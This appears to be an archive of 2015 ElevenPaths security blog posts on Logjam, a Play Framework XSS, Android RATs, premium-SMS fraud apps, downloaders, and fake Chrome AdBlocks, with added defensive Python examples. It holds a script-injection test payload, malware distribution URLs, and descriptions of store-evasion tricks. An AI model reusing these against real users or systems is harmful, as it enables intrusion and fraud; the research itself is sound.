Faast already detects "Logjam": Imperfect Forward Secrecy

Florence Broderick    21 May, 2015
Faast teams have been working all day long to add a new plugin to our list of detected vulnerabilities. A new security problem has been found in the TLS protocol that allows an attacker to force the use of insecure 512-bit keys during the Diffie-Hellman exchange. The use of such a short key, plus the bad practice of servers reusing basically the same 512-bit primes over and over, allows an attacker to break into most supposedly secure connections. This vulnerability, reported today, is known as Logjam and could affect 80% of TLS connections.
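Added example (not Faast's plugin): a small Python checker for the ephemeral Diffie-Hellman strength reported by openssl s_client, so you can spot 512-bit (export-grade) groups and export cipher suites on your own servers. The sample outputs below are constructed, not captured from real hosts.

```python
import re

# Added example, not Faast's plugin: classify the key exchange reported by
# `openssl s_client -connect host:443 </dev/null`. OpenSSL 1.0.2 and later
# print a "Server Temp Key" line for ephemeral (EC)DH exchanges.
TEMP_KEY_RE = re.compile(
    r"^Server Temp Key:\s*(?P<kex>\w+),\s*(?:(?P<curve>[\w-]+),\s*)?(?P<bits>\d+)\s*bits",
    re.MULTILINE,
)
CIPHER_RE = re.compile(r"^\s*Cipher\s*:\s*(?P<name>[\w-]+)", re.MULTILINE)


def classify_dh_bits(bits):
    """Verdict for a finite-field Diffie-Hellman group of `bits` size."""
    if bits <= 512:
        return "critical: export-grade DH group, breakable (Logjam)"
    if bits < 2048:
        return "weak: DH group below 2048 bits, regenerate dhparam"
    return "ok"


def assess_s_client_output(text):
    """Parse s_client output and return cipher, key exchange, bits and a verdict."""
    result = {"cipher": None, "kex": None, "bits": None, "verdict": "unknown"}
    cipher = CIPHER_RE.search(text)
    if cipher:
        result["cipher"] = cipher.group("name")
    key = TEMP_KEY_RE.search(text)
    if key:
        result["kex"] = key.group("kex")
        result["bits"] = int(key.group("bits"))
    if result["cipher"] and result["cipher"].startswith("EXP"):
        # An EXP-* suite was negotiated: the server still serves DHE_EXPORT.
        result["verdict"] = "critical: export cipher suite negotiated"
    elif result["kex"] == "DH":
        result["verdict"] = classify_dh_bits(result["bits"])
    elif result["kex"] in ("ECDH", "X25519", "X448"):
        result["verdict"] = "ok: elliptic-curve exchange, not affected by Logjam"
    elif result["cipher"]:
        result["verdict"] = "info: no ephemeral key reported (static RSA key exchange?)"
    return result


# Constructed s_client excerpts (not real servers).
SAMPLE_WEAK_DH = """\
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES128-SHA
Server public key is 2048 bit
Server Temp Key: DH, 512 bits
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES128-SHA
"""
SAMPLE_ECDHE = """\
Server Temp Key: ECDH, P-256, 256 bits
SSL-Session:
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
"""

if __name__ == "__main__":
    for sample in (SAMPLE_WEAK_DH, SAMPLE_ECDHE):
        print(assess_s_client_output(sample))
```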

Detection of Logjam included in Faast knowledge base

After analyzing the vulnerability, our development teams at Faast have added a plugin to our knowledge base to detect Logjam which, after going through the QA process, has been released tonight. All our persistent pentesting clients will receive security warnings related to this problem if it is detected in their infrastructure.

Latch, the best mobile app of 2015

Florence Broderick    13 May, 2015



We are the winners!
Latch, our mobile app to protect your online accounts and services when you are not connected, has just been recognized as the best mobile app of 2015 by receiving first prize at the Internet Day Awards.

When we are all connected, we are vulnerable. If you have not closed the latch yet, download Latch (it’s free!) on your mobile device from your official app store. Discover the services where you can use Latch and improve the security of your digital life.

Internet Day Awards
The Internet Day Awards is one of the main events of the World Day of the Internet, and has gathered the best initiatives, people and organizations that improve user experience on the Internet and new technologies.

Thanks again to everyone who has trusted the security of Latch, to those of you who are part of our community, to everyone who voted online, and to the jury of the Awards for its recognition.

ElevenPaths finds a XSS problem in Play Framework

Florence Broderick    11 May, 2015
Play Framework is described as “The high velocity Web Framework for Java and Scala”. We use it internally in some of our products. Ricardo Martín from our QA team has found a (potentially persistent) XSS that has now been fixed by the official team. This XSS could make all the platforms based on Play Framework more prone to phishing attacks or to having user data stolen.

Play Framework had a problem with the URL parameter. When it parses the view, it translates it to a URL that will work as a GET request. If the parameter value starts with “:”, an exception to the rule applies and the value is not escaped:

@{Controller.action(URLparameterWithInjection)}

How to get the URL parameter:

How to get the URL parameter where the XSS may be encoded

Then the URL goes through the program. Example of an XSS injection being encoded:

Result of the injected URL, encoded (which is Ok)

But once we “inject” the “:” character…

Result of the injected URL, not encoded (which is a problem)

There is a condition under which the injection is not encoded. In fact, the code in Play Framework makes it clear:

There is a specific condition that does not encode strings beginning with “:”

Whenever the view is interpreted and translated to a URL that will work as a GET request, we may use it as a parameter and have it printed in the result.
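As an added illustration (not Play Framework's own code), the defect class described above reconstructed in Python: a reverse-routing helper that percent-encodes every parameter value except those beginning with “:”, beside the hardened version that encodes unconditionally. The query name q, the action path and the payload value are assumptions.

```python
from urllib.parse import quote

# Added illustration of the defect class described in the post, not Play
# Framework's own code: a reverse-routing helper that URL-encodes a parameter
# value unless it starts with ":", so a crafted value reaches the page unescaped.
PAYLOAD = ':"><script>alert(1)</script>'   # constructed test value


def build_action_url_vulnerable(action_path, value):
    """Mimics the bug: values beginning with ':' skip the encoding step."""
    if value.startswith(":"):
        encoded = value          # the special case bypasses escaping entirely
    else:
        encoded = quote(value, safe="")
    return f"{action_path}?q={encoded}"


def build_action_url_fixed(action_path, value):
    """Hardened form: every value goes through the same percent-encoding."""
    return f"{action_path}?q={quote(value, safe='')}"


def render_link(url):
    """The template inserts the URL produced by @{...} straight into markup."""
    return f'<a href="{url}">go</a>'


def is_injected(html):
    """True when the rendered markup carries an unescaped script tag."""
    return "<script" in html


if __name__ == "__main__":
    for builder in (build_action_url_vulnerable, build_action_url_fixed):
        html = render_link(builder("/Application/show", PAYLOAD))
        print(builder.__name__, "injected" if is_injected(html) else "safe", html)
```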

We developed a PoC and sent it to the developers. Versions 1.2.7 to 1.3.0 have been tested and are vulnerable. Just a week after making them aware of the problem, this alert, which solves the problem, was released: https://www.playframework.com/security/vulnerability/20150506-XssUrlParamerter.

New tool: Google index Retriever

Florence Broderick    24 April, 2015
Have you ever found a webpage that seems to talk about exactly what you need, but it has been removed? Yes, Google cache is the answer, but… what if the cache has been removed too? What if the site is only in the Google index page? You cannot get the webpage back, but you know it was there.

Google Index Retriever will try to retrieve the index in Google, so you can get part of the text back, and maybe the removed content you need. Google cache is not there forever. From time to time, cached pages are simply removed for good. Archive.org and its Wayback Machine do not take as many snapshots of the less popular pages… so there are situations where the only part of a website that is left is in the Google index.

The Google index is that little piece of text on the results page that the Google search engine shows when the user searches for anything. In the “index”, the matching search words appear in bold. The Google index is the last part of a website to disappear, so there will be situations where it is the only part left. Google keeps different “indexes” of the same webpage, so if they could all be put together, the text would be reconstructed and might come back.

But that is not the only situation where the tool may be useful. What if the index contains passwords, credit card numbers or any other sensitive information? In fact, that was one of the reasons to create the tool: to demonstrate that removing a webpage and its cache with offensive or sensitive content is not enough. The content may still be reachable. This is all explained in this presentation.

How does the tool work?

It is very easy. The tool is fed with a Google search that produces an index result. It will try, by brute forcing the Google search (“stimulating it”), to retrieve as much as possible. Then it has some different options:

Example with an evernote profile

  • One Shot button: It just searches once with the information provided. Use this to be as specific as you can with the search string before hitting the “start” button.
  • Start button: It starts searching in automatic mode. The result box will display the time elapsed since the search started, the word that made the information come up, and finally the longest possible sentence if it differs from the last one, so the user may reconstruct the webpage.

The logic used to “stimulate” the index and get the information back is:

  • First, it tries to stimulate the index with the words already found in the first index result “around” the main word searched, so it tries to retrieve the whole sentences again and again.
  • If there are no more results or “words around” left, the search is repeated with keywords provided by the user, like a “dictionary attack”. When this happens, the progress bar changes its color.
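The merging step described above, as an added example that is not the tool's own code: a Python routine that joins overlapping index snippets into the longest recoverable sentence and proposes the next “words around” queries. The snippets are constructed.

```python
import re

# Added example, not Google Index Retriever's own code: merge search-result
# snippets ("indexes") of the same page by their word overlap, and derive the
# next phrases to query around the seed word.


def _tokens(snippet):
    """Split a snippet into words, dropping the ellipses search engines add."""
    return re.findall(r"[^\s…]+", snippet.strip(" .…"))


def _overlap(left, right):
    """Largest k such that the last k words of `left` equal the first k of `right`."""
    for k in range(min(len(left), len(right)), 0, -1):
        if left[-k:] == right[:k]:
            return k
    return 0


def _contained(small, big):
    n = len(small)
    return n <= len(big) and any(big[i:i + n] == small for i in range(len(big) - n + 1))


def _drop_contained(frags):
    """Remove fragments that are a contiguous part of another fragment."""
    return [f for i, f in enumerate(frags)
            if not any(j != i and _contained(f, g) for j, g in enumerate(frags))]


def reconstruct(snippets, min_overlap=2):
    """Greedily merge snippets on their longest word overlap; return what is left.

    min_overlap=2 avoids joining on a single common word such as "the".
    """
    frags = []
    for s in snippets:
        t = _tokens(s)
        if t and t not in frags:          # dedupe so equal fragments survive
            frags.append(t)
    frags = _drop_contained(frags)
    while len(frags) > 1:
        best_k, best_i, best_j = 0, -1, -1
        for i, a in enumerate(frags):
            for j, b in enumerate(frags):
                if i != j:
                    k = _overlap(a, b)
                    if k > best_k:
                        best_k, best_i, best_j = k, i, j
        if best_k < min_overlap:
            break
        merged = frags[best_i] + frags[best_j][best_k:]
        frags = [f for n, f in enumerate(frags) if n not in (best_i, best_j)] + [merged]
        frags = _drop_contained(frags)
    return [" ".join(f) for f in frags]


def next_queries(fragment, seed, window=3):
    """Phrases to the left and right of `seed` to 'stimulate' the index with next."""
    words = fragment.split()
    queries = []
    for idx, w in enumerate(words):
        if w.lower() == seed.lower():
            for phrase in (words[max(0, idx - window):idx + 1], words[idx:idx + window + 1]):
                if len(phrase) > 1:
                    queries.append(" ".join(phrase))
    return queries


# Constructed snippets, as three searches might return them for one page.
SNIPPETS = [
    "… the admin password for the staging server is stored in …",
    "… password for the staging server is stored in the shared wiki page …",
    "… server is stored in the shared wiki …",
    "unrelated snippet about something else",
]

if __name__ == "__main__":
    for text in reconstruct(SNIPPETS):
        print(text, "->", next_queries(text, "staging"))
```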

Google, of course, will show a CAPTCHA from time to time because of the continuous use of its service. This is perfectly fine. Google Index Retriever will capture the CAPTCHA so it is easy to solve and keep going.

Google will show a CAPTCHA from time to time

Spam

This tool may also be used to check whether a site has probably been compromised and injected with spam and black-hat SEO. It is usual for attackers to compromise webpages and inject spam words into them so they “steal” their PageRank.

Using the tool to find possible “hidden” Spam in a webpage

This content is not visible to visitors, only to Google's robot and spider, so it is usually visible in this index. This tab works exactly the same as the other, but with a different logic:

  • It directly tries to search with a different set of keywords (related to spam) in a Google index result.

This way, it is easier to know if a webpage has been compromised and injected with SEO spam.

Other features

The program is written in Java, so it should work under any system and version, although it has been tested under Windows. The results may be exported to an HTML document on the local computer. Keywords and spam keywords are completely customizable. They may be added individually or edited directly in a TXT file.

Customizable keywords

The tool is available to download here.

Vote for Latch on the Internet Day awards 2015

Florence Broderick    10 April, 2015


About Internet Day awards
Internet Day awards recognise those initiatives, persons and organizations that best use Internet and new technologies.

The entry
The main categories to Internet Day awards 2015 are: Best Web, Best Communication Campaign, Best Audiovisual Content, Best App Multidevice and Best Social Media Profile.

Latch has been selected to participate in the Mobile App Multidevice category for the best multidevice app of the year. Protect your accounts and online services. Discover the services where you can use Latch. Search for online services bearing the Latch: Protected badge and click on the logo to regain control of your digital life.

We can win with your vote.
Winners are selected from the online votes of Internet users together with the votes of a jury of recognised professionals from each category. Vote for Latch.

Thanks for being a part of Latch.

Fake AdBlocks in Chrome Web Store lead to… adware?

Florence Broderick    7 April, 2015
No platform is free from abuse. Chrome Web Store has been abused in the past, mainly by ad injectors or general adware. In fact, Google has just removed almost 200 offensive extensions affecting 14 million users. But what if apps and extensions are just the “way” to convince users to install some other software or to visit a webpage? Apps and extensions as a spam technique? This has been happening for a while now with fake “AdBlocks” that lead to some other Russian anti-adware, using the Web Store as a spamming platform.

It is, in a way, a situation similar to when we found fake AdBlocks in Google Play and the recent use of Google Play Books as a platform for spreading adware and malware. Chrome Web Store is hosting fake AdBlocks, one of the most popular extensions for browsers. These apps (they are not extensions) are harmless “per se”, since they are just redirectors to some other website where some other programs are offered. Not especially dangerous… for now. This technique may prove quite successful for attackers who want to “spam” their content, programs, adware or anything else. Does this mean Chrome Web Store is storing adware/malware directly with these fake apps or extensions? Not at all (they are hosting ad injectors but trying to remove them), but they are allowing developers to upload fake extensions that take advantage of a reputable brand (like AdBlock) to confuse users and get them to download something else. Nothing new, except maybe for the platform used.

How they work

The fake AdBlocks we detected are very simple, typical Chrome apps. We have found the same program, with little differences, under several different developer accounts. Here are some samples (not all of them appeared at the same time):

Some of the AdBlocks detected from different developers

These apps need no permissions. That is strange and “impossible” if it were a real AdBlock, since such an app should at least be able to read and modify data on the websites you are visiting. Moreover, it should be a real extension, rather than an app.

No permissions needed

Internally, the only thing these apps do is this:

Fake AdBlockPlus code (in background.js file)

  • chrome.runtime.onInstalled.addListener: once the app is installed, the target webpage is opened in Chrome.
  • chrome.app.runtime.onLaunched.addListener: when the app is launched, the target webpage is opened in Chrome.

The URLs they open are changed all the time.
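An added example (not from the original post) of how a defender or store reviewer can triage such a package: Python heuristics over a manifest.json and background.js that flag a brand name with no permissions, an ad blocker packaged as an app, and an install/launch hook that opens an external URL. The manifests, the script and the redirect.example URL are constructed.

```python
import json
import re

# Added example, not code from the original post: triage a Chrome Web Store
# package from its manifest.json and background.js, looking for the pattern
# described above (a brand-name "ad blocker" that only redirects to a website).
LISTENERS = (
    "chrome.runtime.onInstalled.addListener",
    "chrome.app.runtime.onLaunched.addListener",
)
URL_RE = re.compile(r"https?://[^\s'\"`)]+")
BRANDS = ("adblock", "ad block", "abp")


def triage_chrome_package(manifest_json, background_js):
    """Return {"findings": [...], "urls": [...], "hooks": [...]} for a package."""
    manifest = json.loads(manifest_json)
    name = manifest.get("name", "").lower()
    claims_brand = any(b in name for b in BRANDS)
    perms = manifest.get("permissions", [])
    findings = []
    if claims_brand and not perms:
        # A real blocker must at least read and modify the pages you visit.
        findings.append("brand-name-without-permissions")
    if claims_brand and "app" in manifest:
        # Ad blockers are extensions; a packaged app cannot filter page content.
        findings.append("ad-blocker-packaged-as-app")
    urls = URL_RE.findall(background_js)
    hooks = [hook for hook in LISTENERS if hook in background_js]
    if hooks and urls:
        # Install/launch hook plus an external URL: the app is a redirector.
        findings.append("install-or-launch-redirect")
    return {"findings": findings, "urls": urls, "hooks": hooks}


# Constructed sample mimicking the fake AdBlockPlus described above.
SAMPLE_MANIFEST = json.dumps({
    "name": "AdBlock Plus",
    "version": "1.0",
    "manifest_version": 2,
    "app": {"background": {"scripts": ["background.js"]}},
})
SAMPLE_BACKGROUND = """
var target = 'http://redirect.example/adguard.html';   // placeholder, not a real site
chrome.runtime.onInstalled.addListener(function () { window.open(target); });
chrome.app.runtime.onLaunched.addListener(function () { window.open(target); });
"""

# Constructed control: a blocker-like extension with real host permissions.
CONTROL_MANIFEST = json.dumps({
    "name": "AdBlock Plus",
    "version": "1.0",
    "manifest_version": 2,
    "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"],
    "background": {"scripts": ["background.js"]},
})
CONTROL_BACKGROUND = (
    "chrome.webRequest.onBeforeRequest.addListener("
    "function (d) { return {cancel: true}; }, {urls: ['<all_urls>']}, ['blocking']);"
)

if __name__ == "__main__":
    print(triage_chrome_package(SAMPLE_MANIFEST, SAMPLE_BACKGROUND))
    print(triage_chrome_package(CONTROL_MANIFEST, CONTROL_BACKGROUND))
```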

Where they go to

These are the links we have seen so far:

  • hxxp://www.appforbrowsers.com/adguard.html
  • hxxp://www.surprisess.com/adguard.html
  • hxxp://www.appforchrome.com/adguard.html

And there are some others that, after going to some kind of app aggregator, redirect to the real AdBlock.

  • hxxp://prodownnet.info/adblock-super/
  • hxxp://appstoreonline.blogspot.com/search/label/adblock%20chrome
  • hxxp://appstoreonline.blogspot.com/search/label/adblock%20youtube

Most of them open websites that encourage the user to download a program called Adguard, a supposed ad blocker for PC that has its own extensions for different browsers. Is this adware disguised as anti-adware? Not an easy answer. Google was blocking the site when visited with Chrome, at least as of a few days ago. This means Google (and maybe only Google) thinks, or thought at some point, that this URL belongs on a blacklist.

Google blocking adguard installer a few days ago

We know that the Adguard app was removed (maybe by Google, maybe by the owners) from Google Play last December. Moreover, some engines in VirusTotal think that this is some kind of malware, detecting it with generic signatures (except Rising, the Chinese AV).

Some engines detecting the AdGuard installer

It could be a false positive, something not widely discovered yet, or just the kind of software that is legal and moves in the grey zone where some AV engines have to “respect” it by not detecting it… but is harmful for users once installed anyway.

The only way to know for sure would be a manual analysis. A quick analysis shows that the exe itself changes very often. It is just a downloader for download.adguard.com/setup.exe, which is a much more complex program and, again, detected by just one engine with generic signatures… which means nothing. Although Google and some AVs are detecting it, it is most likely not a dangerous program. And, probably, they are not the ones directly responsible for these fake AdBlocks either… They may have a reward program for websites that bring downloads… who knows.

Conclusions

The important point is not that fake Chrome apps point to some ad blocker. The conclusions could be:

  • Obvious, but any platform is susceptible to being abused and “spammed”. Chrome Web Store is being abused in an “innocent” way (aside from the ad injectors) with fake apps that induce the user to visit and download some other software. Using the same name and icon as reputable programs as bait is very effective for attackers… but easy to track and avoid for the store.
  • Although it seems to redirect to some software in a “spamming” campaign aimed at getting more “visits”, and that’s all so far… what if it redirects to some other website? Would it be as effective from the attackers’ standpoint as these ad injectors with 14 million affected users? We may see more apps like this in the future leading to really aggressive adware or malware.
  • Users have to be careful interpreting AV results, for good or bad: false positives exist… and of course false negatives do as well. With a high enough rate of both, the average user never really gets to know.

The Chrome app launcher after installing some fake ABP
Sergio de los Santos

The month of the RAT in Google Play

Florence Broderick    30 March, 2015
A few days ago, Lukas Stefanko from ESET discovered a new remote administration tool (RAT) for Android. Although there are some known RATs for Android, this malware had something special: it used Baidu Cloud Push notifications to send commands to the victims. What we can confirm (not in the original blog entry) is that this RAT has been available not only in “alternative markets”, but in Google Play, undetected for more than a month.

Several kinds of RATs for Android exist. Two basic characteristics define a RAT:

  • What and how it is able to control the infected device.
  • How the victim receives the commands.

How the victim receives the commands opens a handful of possibilities: HTTP, SMS, the Jabber protocol, GCM (Google Cloud Messaging)… and now Baidu Cloud Push notifications. Cloud Push is a system where developers can register users. Registered users will receive push notifications on their devices (a special notification in the status bar). This is used in millions of legitimate apps, and Google allows the use of its GCM for free. This system has been abused to push ads in the past. Any developer may create their own GCM-like service, and Baidu has a popular one in China. This time it has been abused to push commands to this botnet. This technique is quite new. So new that the malware went undetected by antiviruses for months.

What does the RAT do?

Once it infects the system, it waits for commands from the Command and Control server, which is a specially crafted Baidu Cloud Push instance. Basically, the picture below summarizes it all.

Commands that the attacker may send to the device

It shows the commands the device may get from Baidu. The app has every permission necessary to perform the tasks, so the infected user is completely at the attacker's disposal.

All the information goes through “/mnt/sdcard/DCIM/Camera/%file_name%” before being uploaded to the Baidu cloud storage (BCS) and removed from the device.

But… this has not only been in alternative markets

Stefanko found the samples in alternative markets, which is, in a way, “expected”. But some of these samples were indeed in Google Play… for more than a month. With more than 50,000 downloads, the victims may still be under the control of the attacker.

One of the RATs, available in Google Play

Thanks to Tacyt (although we did not find these samples in time…) we now know that several different samples with the same behavior were available in Google Play from, at least, November 2014. Some samples, under a certain developer, were signed during November 2014 and were available in Google Play since December. The apps were available in the main market until late January, when Google removed them. It seems that some others were available from September until late January as well, under some other fake account. These apps are still in lots of other markets. The developer seems to be from South Korea.

He has been using different names and emails: “zhengcaiai”, “devzhemin520”, “su weiyu”… This domain belongs to the attacker as well: http://devzhemin.dothome.co.kr.

What about antiviruses?

The samples were not detected about five months ago, when it all started.

One of the RATs not being detected

Until March 17th approximately, it was fully undetected. ESET and Avira have been the first ones detecting them.

Some of the first engines detecting the samples

A few days later, some others have created a signature, but still not all the big players.

Some more engines detect the samples

They have named it the “cajino” RAT because of the package name that Stefanko found. They all started with ca.ji.no.method[*] and a number. But the attacker has also used the han[*].play.app structure for naming the apps in Google Play.

Newer versions are less detected

For the newer versions, the only ones catching them are Avast, DrWeb and ESET, the ones that created the original signatures. This perfectly illustrates the notion of “quality signatures” that protect the user from future versions as much as possible.

Conclusions

RATs are not “rare” in the Android world, but they are not common, either. Aside from the conclusions of the ESET researcher, the important issues to point out here are:

  • New methods to communicate have been used.
  • Apps have gone undetected by researchers/antiviruses for almost six months.
  • The attacker has been in Google Play (the best place ever for attackers) for more than a month.
  • And it will still get more victims, because the app is still in a lot of different markets.

It is not usual to have “RATs” in Google Play. One of the latest cases was the detection of Dendroid, a RAT system designed to evade Google Play filters, a year ago.

Some different hashes (aside from the ones ESET found) are:

  • 7a131e44d731995e51b7e439082273abbbf02602
  • 48412835d0855c565f213242b0db7a26480fcc2e
  • 4c9e505f1132528c68091fa32bb1844d7cbd2687
  • 31a645973554b7c83cc0bd6fb7709ec12937c962

The attacker is also distributing (aside from other markets) the apk from here: hxxp://guangzhouhan1.dothome.co.kr/music.apk, so it may change at any minute.

Sergio de los Santos

More apps in Google Play subscribing to SMS premium numbers: JSSMSers

Florence Broderick    23 March, 2015
After finding the JSDialers, we should have figured it out. The attackers are using exactly the same technique as in JSDialers to spread apps that subscribe the victims to premium SMS numbers. This way they have avoided Google Play's protection systems and used new techniques based on JavaScript, more dynamic and smarter. They are not yet statically detected by antivirus engines. Let’s see how they work.

We have found 14 apps with the same behavior in Google Play that, under different pretexts (from jokes to recipes), subscribe the user to premium SMS numbers. Although the apps show a message about the subscription, they send an SMS by themselves confirming the subscription in a transparent way, so the user does not notice anything. The attacker got more than 100,000 downloads. Not all downloads translate into direct subscriptions because the attackers only target the major carriers in Spain, and if the device does not match these conditions, the app behaves normally.

What the user perceives

When the user downloads and installs any of these apps, something like this will be shown.

This is what the user sees if the device belongs to the right carrier and country

It is true that the attacker is actually warning the user: you are going to be subscribed. But the SMS is sent automatically, leaving no trace on the phone. In previous apps like this, the button used to be less explicit (maybe “Accept” or asking for your age), but this time the attackers used “Subscribe”, which should make users more aware of the problem.

The app will check that the device belongs to the right carrier and is in Spain. By then, two different SMSs have been sent, one to start the subscription and another to confirm it, but the user will notice nothing.

JavaScript code to check for carrier and country

What happens and how it works?

The whole program is launched inside a WebView and calls an index file that ships with the apk itself. When the two SMSs are sent, the apps use an interesting trick. They dynamically load the receiver that intercepts the incoming messages. Usually, these receivers are declared in AndroidManifest.xml. Why dynamically? Possibly to avoid static analysis. Although the app has the permission to intercept SMSs, a sandbox or analyst will think the developer does not really use it, because the app lacks any routine to handle them. But in reality it loads the receiver only if and when necessary. The receiver runs when the device receives a message and makes the app mark it as “already read”, so the user does not notice any welcome message from the subscription service.

Dynamic receiver to handle incoming SMSs

So, what is new?

There are several interesting parts on these apps.

  • First, the use of JavaScript and Cordova (the bridge between JavaScript and the apk) to send messages and avoid introducing code in the app itself. This moves the whole logic to the server, which makes it more powerful, dynamic and undetected.
  • Loading the receiver dynamically may confuse a static analysis. The receiver is only declared under the right circumstances (right carrier and country), which makes it stealthier. Besides, the receiver is loaded (and may be unloaded too) via the JavaScript code, so it will only show up in a dynamic analysis if all conditions are satisfied.
  • It does not use the usual system to send messages, but hands them directly to the SMS provider. This prevents the sent messages from being kept in the “sent” or “outbox” folder. It provides the SMS text directly to the operating system's provider.

Marking the incoming SMS as already read

Other apps like these

Who is behind these apps? Obviously they are related to the JSDialers we talked about a few weeks ago. The subscription company and domains give us the answer.

These are screenshots of some of the apps we have found thanks to Tacyt:

Some of the apps with this behavior

These are the title, package name, and hash of the applications found:

  • Frases celebres bonitas cortas,com.thinkking,1e8568ccc54be7a73934965e97ff7e3fd9e4fec3
  • Imagenes amor fotos frases,com.romaticpost,2d26c676bcb5a5f8599f49a5b90599b7ff93dc11
  • Phrrasesfee,com.prasesfee,ca6ac2e1bf46087455fda358870070ec269faae6
  • Statetss,com.statetss,da045796efc737d42b9e86876ec5b854289212bc
  • New mensajes navidad y frases,com.navidad.extra,18db1cfb7e7340a5476a5c6e17f1f9d596045095
  • Postales perritos fondos,com.imagepets,bbc6e386281f2b1931ff2be7812bf4de4530d3fe
  • Funnyys,com.funnyys,9fc9e237903b02a2a47701139200c9177eec16a5
  • Fotos frases amor postales,com.prasesamor,65ce3043fc249cb906b4e50a23d581d5c70819fa
  • Gatitos tiernos fondos postal,com.cattss,f68ef39f5183da0745614c68a7ae135085298b54
  • Recetas de cocina dietas Salud,com.kitchenn,7fa17bed794a59dd3d914d05535fe25a357ab1cd
  • Chistes cortos buenos,com.chistescortos,daac73a325485f882b1dcda9758b16bb5f407770
  • Chistes Picantes buenos cortos,com.chistespicanticos,dc799bcc3f1f623e211e50fbb6ececb2e64753a6
  • Laughtter,com.laughtter,f569baf1c0f12c137a09e084c879979bbcfd11e1
  • Healthyy,com.recipesmart,0dd97d056fa7559a2cdb35d45850cefd400f4d6f
Sergio de los Santos
Juan Manuel Tirado

The impacts and benefits of telemetry in Industrial m2m processes

Beatriz Sanz Baños    12 March, 2015

Industrial m2m solutions apply to different fields of industrial processes and can be used in different ways instead of having clear use cases like other more traditional m2m solutions.

The timeframe for these solutions is also very different. Whereas Fleet Management or Utilities are mature markets, some Industrial uses are barely starting to surface at the moment.

What is crippling growth in Industrial m2m solutions?

Technology is the main improvement area for Industrial m2m solutions to fulfil their full potential. As the big players embrace technologies that enable the connection of industrial equipment this also has an impact on dropping the cost of communication technologies driving the general growth in this market.

One of the main differences between Industrial m2m solutions and others is the heterogeneity. Industrial m2m applies to diverse use cases and the targets are usually market niches. This vertical business usually offers enabled platforms that centrally control m2m devices. This platform aggregates data and displays it centralised in a single dashboard freeing users from expensive proprietary solutions. m2m is therefore a facilitator for many businesses to take control of their industrial processes gaining access to their data in a simple and aggregated way.

Tank Telemetry (fuel, agri-food or chemical tanks, to name a few), retail/industrial refrigerators (like those in breweries), asset management and vending (for both telemetry and e-payment) are the most demanded uses for Industrial m2m solutions.

Refrigerators are the perfect example of telemetry in Industrial m2m processes. They can be part of cold chain management. Having a managed cold spot allows for several use cases: we can check that delivery processes are being carried out timely and correctly, or prevent theft through the location of these very expensive assets.

The state of affairs in Telemetry

As prices of components plunge, the market is starting to provide solutions that connect through either improved LPWA, or LBE networks, or traditional connection networks allowing more efficient uses. 

The core importance of technological breakthroughs like LPWA accelerates the development and adoption rate of industrial m2m solutions that rely on these technologies to deliver new or improved services.

Telefónica envisions the importance of industrial solutions with a long tail approach. Industrial m2m Solutions (tank telemetry, connected vending, etc.) may not individually have the same volume or turnover that the major (traditional) m2m vertical businesses do but the long tail composed of all the Industrial m2m solutions is globally comparable to the relevance of traditional m2m vertical businesses and are therefore a very relevant percentage of the business volume.

The future of telemetry

There is an ongoing strategy shift among the industrial big players (those that do not have a solid foothold in the m2m business), and they are all coming to terms with the fact that they cannot remain out of the m2m business. Their manufacturing processes are being modified to produce m2m-ready equipment. Big industrial players such as Siemens, General Electric or others that do not have a strong position in the m2m market are taking the necessary steps that will enable them to play a leading role in the market.

The future of tracking

A typical use case that defines how industrial m2m solutions can transform the market are delivery tracking sensors. Previously only available for high value goods or for the cold chain, it is now slowly extending to traditional courier delivery services. Expendable, low cost tracking elements inside packaging will allow courier service companies to offer an end to end tracking of deliveries. These new services can be monetized and blow fresh air into revived businesses like postal services that were facing a collapse in their business model. Thanks to industrial m2m solutions businesses can offer a new improved service and compete by adding value instead of only relying on reducing operational costs.

"Not today downloaders": New downloaders techniques in Google Play

Florence Broderick    27 February, 2015
Downloaders are not new in Android, but lately they are becoming more and more important for attackers as a method to bypass Google Play's barriers and malware detection. At Eleven Paths we have detected downloaders that, under the appearance of innocent apps, are able to download a much more dangerous apk (literally anything). It needs user interaction and the “install from unknown sources” setting enabled, but the trick it uses to fool the victim is quite ingenious, and allows a second app to run without the user associating the future problems with the first app installed. Let’s see how.

Downloaders are an old trick on PC and not exactly new on Android. These apps try to “find their way” to the victim, using fewer permissions, or even delivering whatever feature they promise. This is how they get into Google Play. Then, in some future version, once they are established in the market, they mutate. They become downloaders of some other, much more complex adware or malware. Attackers are much more successful with these techniques. There are lots of them. Let’s see a new one.

How it works

The apps we have found are not widely detected by antivirus yet and, if they are, it is mostly because of the aggressive ad techniques they use, not for the download technique itself. Many of them are even still in Google Play. We are analyzing this one, which is still online.

One of the downloaders in Google Play

It is supposed to be a voice changer, and it indeed is, just saving a .wav file and modifying the playback frequency. The app itself has three different SDKs from three different ad providers. This means the downloader itself floods the device with aggressive ads. But that is not enough… The app declares a receiver for “USER_PRESENT”.

USER_PRESENT receiver, to activate when the user unlocks the device

This is an official event that is launched every time the device is “woken up” by a user, in other words, basically when it is unlocked. This is the code that runs when the event is received:

Code activated when the telephone is unlocked

Basically, what the app is doing is making sure that it has connectivity. Then it checks that it is only launched once a day. This happens even when we are “out of the app”. The app counts the times it has been executed (with the “k” variable) and stores the count in its preferences.

Downloading… but not today

The app does not download anything on the same day the downloader was installed, so it avoids any “dynamic analysis”. The user will install this voice changer, but will not notice anything strange until, at least, the next day. Then, the next day, another check is done. Two out of three times it will visit the URL shown in the image. There, a txt file points to some other app in Google Play, so the developer floods the screen with “ads”.

The interesting part happens when the app does not enter this “if” clause and continues down the code. The method Gfveaqwfea checks whether a package named com.facebook is present. That is not the official Facebook app (which is com.facebook.katana) but the adware that is about to be installed; the check only avoids installing it twice.

Checking if com.facebook exists, and if not, downloading the new app

The app then checks whether the device allows installing apps from outside Google Play (the “Unknown sources” setting). This is very common in certain countries where the use of Google Play is limited, and it is also a common configuration among users who like to install “unofficial” apps, so the trick will be very successful in those scenarios. If the setting is enabled, a.apk is downloaded from the URL and saved as xxx.apk.

Checks the “install from outside Google Play” setting. If it is enabled, the app tries to download the new apk
The new apk in the “Download” folder

The user sees nothing and is asked nothing during the download. Then the downloaded apk is launched. Depending on the device configuration, in particular whether the user has previously made Verify Apps or Install Directly the default action, an app chooser may or may not appear. When this second app is being installed, this is what the user sees:
